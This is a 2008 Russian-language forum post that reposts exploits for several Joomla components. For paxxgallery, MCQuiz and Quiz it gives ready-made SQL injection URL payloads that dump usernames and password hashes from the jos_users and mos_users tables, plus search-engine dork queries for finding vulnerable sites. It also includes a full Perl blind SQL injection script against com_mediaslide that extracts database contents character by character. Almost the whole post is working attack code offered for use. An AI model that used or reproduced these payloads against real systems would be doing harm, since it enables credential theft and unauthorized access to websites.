
14.02.2008, 23:23
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме: 5516499
Репутация:
3702
|
|
Joomla Component paxxgallery 0.2 (iid) SQL Injection
Exploit
Код:
AFTER userid ADD EXPLİOT(USERİD DEN SONRA EXPLOİT EKLE)
EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOİT
EXPLOIT==
S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users
Для поиска
Код:
allinurl: com_paxxgallery "iid"
allinurl: com_paxxgallery "userid"
Joomla Component MCQuiz 0.9 Final (tid) SQL Injection
Exploit
Код:
ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE
EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]
EXPLOIT=1=
1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*
EXPLOİT=2=
1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Для поиска
Код:
allinurl: com_mcquiz "tid"
allinurl: com_mcquiz
Joomla Component Quiz <= 0.81 (tid) SQL Injection
Exploit
Код:
ALL PASSWORD AND USERNAME UNDER PAGE
EXAMPLE: AFTER tid add EXPLOİTS
www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]
EXPLOIT=1=
1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOİT=2=
1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Для поиска
Код:
allinurl: com_quiz"tid"
allinurl: com_quiz
(c)
Joomla Component mediaslide (albumnum) Blind SQL Injection
Код:
#!/usr/bin/perl
#inphex
#joomla com_mediaslide blind sql injection
use LWP::UserAgent;
use LWP::Simple;
use Switch;
use Digest::MD5 qw(md5 md5_hex md5_base64);
print "usage: $0 -h host.com -p /\n";
### use Getopt::Long; ###
$column = "username";
$table = "jos_users";
$regex = "preview_f2";
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-r" => "regex");
$a = 0;
foreach (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}
$i = 48;
$h = 1;
$f = 0;
$k = 0;
### Yeah,that's it... ###
while () {
while ($i <= 90) {
if(check($i,$h,1) == 1)
{
syswrite STDOUT,lc(chr($i));
$h++;
$a_chr = $a_chr.chr($i);
}
$i++;
}
push(@ffs,length($a_chr));
if (($#ffs -1) == $ffs) {
&check_vuln();
exit;
}
$i = 48;
}
#/
### :D ###
sub check($$$)
{
$i = shift;
$h = shift;
$m = shift;
switch ($m)
{
case 1 { $query = "%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$h.",1)=CHAR(".$i.")"; }
}
$ua = LWP::UserAgent->new;
$url = "http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
$response = $ua->get($url);
$content = $response->content;
if($content =~ /$regex/) { return 0;} else { return 1 ;}
}
#/
sub check_vuln
{
$content = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
$content1 = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");
foreach $bb1 (split(/\n/,$content)) {
$bb = $bb.$bb1;
}
foreach $yy1 (split(/\n/,$content1)) {
$yy = $yy.$yy1;
}
$f = md5_hex($bb);
$s = md5_hex($yy);
if ($f eq $s) {
print "\nprobably not vulnerable"; #could be that ads,texts etc.. change
exit;
} else { print "\nvulnerable..."; }
}
# milw0rm.com [2008-02-14]
|
|
|